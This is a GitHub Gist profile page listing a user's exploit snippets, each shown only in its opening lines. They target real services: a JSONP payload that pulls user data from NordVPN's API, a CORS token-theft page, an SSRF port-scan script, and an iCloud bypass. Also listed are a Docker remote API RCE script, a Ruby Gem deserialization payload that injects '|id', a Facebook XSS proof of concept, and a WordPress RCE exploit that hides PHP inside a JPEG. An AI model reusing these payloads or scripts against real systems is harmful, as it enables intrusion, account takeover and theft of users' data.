Skip to content

Instantly share code, notes, and snippets.

View andripwn's full-sized avatar
☺️
Taking it easy

mickeybrew andripwn

☺️
Taking it easy
107 followers · 12 following
View GitHub Profile
@andripwn
andripwn / json-exploit.html
Created February 8, 2020 17:12
Steal Customer Sensitive Information - With alert Json API
<script>
function rip(a) {
alert(JSON.stringify(a[1]));
}
</script>
<script src="https://join.nordvpn.com/api/v1/users?callback=rip"></script>
@andripwn
andripwn / CVE-2018-6389.sh
Created February 8, 2020 20:47
CVE-2018-6389 Service Attack
#!/bin/bash
#This colour
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'
@andripwn
andripwn / StealToken.html
Created February 19, 2020 20:33
Full Account Takeover through CORS with connection Sockets
<!DOCTYPE html>
<html>
<head><title>Exploiting CORS</title></head>
<body>
<center>
<h1>Getting your information through CORS</h1>
<button type="button" onclick="ProcessUrls()">Exploit</button>
</div>
<script type="text/javascript">
var cont = 0;
@andripwn
andripwn / pwn-urlatt-redir.py
Created February 20, 2020 13:07
SSRF - URL Attachments Bypass
import json
import requests
import sys
HOST = 'https://sandbox.open-xchange.com'
USERNAME = '[email protected]'
PASSWORD = 'secret'
PORTS = [22, 23, 443, 444]
@andripwn
andripwn / icloud-bypass.sh
Created February 21, 2020 21:06
#!/bin/bash
# colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
RESET='\033[0m'
# install homebrew
echo -e "[-] ${GREEN}install homebrew...${RESET}"
@andripwn
andripwn / docker.py
Created February 26, 2020 16:08
console-put-rce
from __future__ import print_function
import requests
import logging
import json
import urllib.parse
# NOTE
# Enable Remote API with the following command
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
# This is an intended feature, remember to filter the port 2375..
@andripwn
andripwn / crawler.py
Created February 27, 2020 17:03
Tesla Clawler
import argparse
import requests
import logging
import pandas as pd
import time
logging.basicConfig()
logger = logging.getLogger('tesla-crawler')
logger.setLevel(logging.INFO)
@andripwn
andripwn / OTP.rb
Last active March 5, 2020 17:55
Universal OTP
#!/usr/bin/env ruby
class Gem::StubSpecification
def initialize; end
end
stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
@andripwn
andripwn / fb-xss-poc.html
Created March 12, 2020 17:03
iPhone app XSS in Facebook Mail
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
<script type="text/javascript">
// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
$(function(){
parse_messages = function()
{
$('.twoLines.preview>.snippet').each(function(index,value)
{
lines = value.innerHTML.replace(/(<([^>]+)>)/ig,'');
@andripwn
andripwn / wordpress-rce.js
Created March 16, 2020 15:53
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);